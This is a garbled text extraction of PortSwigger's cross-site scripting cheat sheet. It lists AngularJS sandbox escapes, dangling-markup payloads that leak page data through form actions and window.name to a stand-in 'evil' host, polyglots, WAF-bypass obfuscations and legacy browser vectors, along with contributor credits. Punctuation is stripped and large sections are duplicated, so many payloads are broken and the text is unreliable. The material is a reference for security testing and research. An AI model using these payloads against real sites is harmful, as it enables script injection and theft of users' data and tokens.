GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
